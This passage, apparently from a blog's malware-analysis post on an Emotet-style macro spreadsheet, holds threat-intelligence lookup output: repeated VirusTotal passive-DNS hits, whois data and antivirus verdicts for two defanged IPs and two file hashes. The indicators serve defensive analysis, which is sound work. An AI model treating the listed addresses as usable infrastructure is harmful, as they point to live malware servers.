\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] No McAfee Threat Results
\n[-] No ThreatCrowd IP Report Results
\n[-] No GreyNoise Results<\/p>\n
********************************************************************************
\n* Information for 217.182.143.248
\n* Observable type: ipv4 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[+] IP Whois Results
\n[-] ASN Information: (‘16276’, ‘217[.]182.0.0\/16’, ‘2001-03-02’, ‘ripencc’, ‘FR’)
\n[-] Network Information: (‘217[.]182.0.0\/16’, ‘FR-OVH-20010302’, ‘217[.]182.0.0 – 217[.]182.255.255’)
\n[-] Registration Info: (‘2017-02-20’, ‘2017-02-20’)
\n[-] Registration Locality: FR
\n[-] Abuse Email: abuse@ovh[.]net
\n[+] IPVoid Results
\n[-] Number of detections: 3
\n[-] IP Void Detection Rate: 3%
\n[-] Engines: (‘IPsum’, ‘hXXps:\/\/github[.]com\/stamparm\/ipsum’)
\n[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps):\/\/www[.]redstout[.]com\/index[.]html’)
\n[-] Engines: (‘Snapt NovaSense’, ‘hXXps:\/\/novasense-threats[.]com\/’)
\n[-] No Malc0de Results
\n[+] AbuseIPDB Results
\n[-] AbuseIPDB reports: 7
\n[-] No SANS Results
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal pDNS Results
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/217[.]182.143.248\/’)
\n[-] No McAfee Threat Results
\n[-] No ThreatCrowd IP Report Results
\n[-] No GreyNoise Results<\/p>\n
********************************************************************************
\n* Information for 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[+] VirusTotal File Report Results
\n[-] Date submitted: 2022-03-15 16:55:14
\n[-] Detected engines: 30
\n[-] Total engines: 60
\n[-] Scans: (‘DrWeb’, ‘X97M[.]DownLoader.929’)
\n[-] Scans: (‘MicroWorld-eScan’, ‘Trojan[.]Vita.6’)
\n[-] Scans: (‘FireEye’, ‘Trojan[.]Vita.6’)
\n[-] Scans: (‘CAT-QuickHeal’, ‘DOC[.]Emotet.45887’)
\n[-] Scans: (‘Sangfor’, ‘Malware.Generic-XLM[.]Save[.]ma35’)
\n[-] Scans: (‘Alibaba’, ‘TrojanDownloader:VBA\/MalDoc[.]ali1000101’)
\n[-] Scans: (‘K7GW’, ‘Trojan ( 0058ce181 )’)
\n[-] Scans: (‘K7AntiVirus’, ‘Trojan ( 0058ce181 )’)
\n[-] Scans: (‘Arcabit’, ‘Trojan[.]Vita.6’)
\n[-] Scans: (‘Cyren’, ‘XLSM\/Downldr.A[.]aggr!Camelot’)
\n[-] Scans: (‘ESET-NOD32’, ‘multiple detections’)
\n[-] Scans: (‘TrendMicro-HouseCall’, ‘TROJ_FRS[.]VSNTCE22’)
\n[-] Scans: (‘Avast’, ‘VBS:Malware-gen’)
\n[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
\n[-] Scans: (‘BitDefender’, ‘Trojan[.]Vita.6’)
\n[-] Scans: (‘Emsisoft’, ‘Trojan[.]Vita.6 (B)’)
\n[-] Scans: (‘TrendMicro’, ‘TROJ_FRS[.]VSNTCE22’)
\n[-] Scans: (‘McAfee-GW-Edition’, ‘X97M\/Downloader[.]kj’)
\n[-] Scans: (‘Sophos’, ‘Troj\/DocDl-AFRE’)
\n[-] Scans: (‘GData’, ‘Macro.Trojan-Downloader[.]Agent[.]BDH’)
\n[-] Scans: (‘Antiy-AVL’, ‘Trojan\/Generic[.]ASMalwRG.167’)
\n[-] Scans: (‘Microsoft’, ‘TrojanDownloader:O97M\/Emotet[.]PKCL!MTB’)
\n[-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
\n[-] Scans: (‘AhnLab-V3’, ‘Downloader\/XML[.]XlmMacro.S1774’)
\n[-] Scans: (‘McAfee’, ‘Downloader-FCHG!CAB6670DF74A’)
\n[-] Scans: (‘MAX’, ‘malware (ai score=85)’)
\n[-] Scans: (‘Zoner’, ‘Probably Heur.W97ShellN’)
\n[-] Scans: (‘Rising’, ‘Downloader[.]Agent\/XLM!1.DC56 (CLASSIC)’)
\n[-] Scans: (‘Fortinet’, ‘MSExcel\/Agent[.]DVP!tr’)
\n[-] Scans: (‘AVG’, ‘VBS:Malware-gen’)
\n[+] MetaDefender File Report Results
\n[-] Date submitted: 2022-03-15T17:04:08.882Z
\n[-] Detected engines: 6
\n[-] Total engines: 35
\n[-] Scans: (‘Cyren’, ‘XLSM\/Downldr.A[.]aggr!Camelot’)
\n[-] Scans: (‘IKARUS’, ‘Trojan-Downloader[.]XLM[.]Agent’)
\n[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
\n[-] Scans: (‘McAfee’, ‘X97M\/Downloader[.]kj’)
\n[-] Scans: (‘RocketCyber’, ”)
\n[-] Scans: (‘Sophos’, ‘Troj\/DocDl-AFRE’)
\n[-] Scans: (‘Webroot SMD’, ”)
\n[-] Scans: (‘Jiangmin’, ‘Unavailable (production)’)
\n[-] Scans: (‘Scrutiny’, ”)
\n[-] Scans: (‘Vir[.]IT eXplorer’, ‘X97M[.]Emotet[.]DGN’)<\/p>\n
********************************************************************************
\n* Information for a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[+] VirusTotal File Report Results
\n[-] Date submitted: 2022-03-15 01:13:22
\n[-] Detected engines: 4
\n[-] Total engines: 65
\n[-] Scans: (‘Kaspersky’, ‘VHO:Trojan-Banker.Win32[.]Convagent[.]gen’)
\n[-] Scans: (‘Antiy-AVL’, ‘Trojan\/Generic[.]ASCommon.21F’)
\n[-] Scans: (‘Microsoft’, ‘Trojan:Win32\/Sabsik[.]FL.B!ml’)
\n[-] Scans: (‘Rising’, ‘Trojan[.]Kryptik!8.8 (C64:YzY0Oh\/jx0YklSUX)’)
\n[+] MetaDefender File Report Results
\n[-] Detected engines: 1
\n[-] Total engines: 1
\n[-] Scans: (‘Avira’, ‘TR\/AD[.]Nekark.a6565a’)<\/p>\n","protected":false},"excerpt":{"rendered":"
Summary ======== As part of brushing the “rust” off and getting back into the malware analysis and blogging thing, and since I have some free time since I am on holiday, I decided to see what was in the mail filters for anything interesting or fun to play with. I did come across an email that had an encrypted zip attachment that was an Excel spreadsheet that leveraged a macro in it. For this post, I am not digging into the macro. This will be a simple analysis post. As usual, all the artifacts from this investigation can be found…<\/p>\n
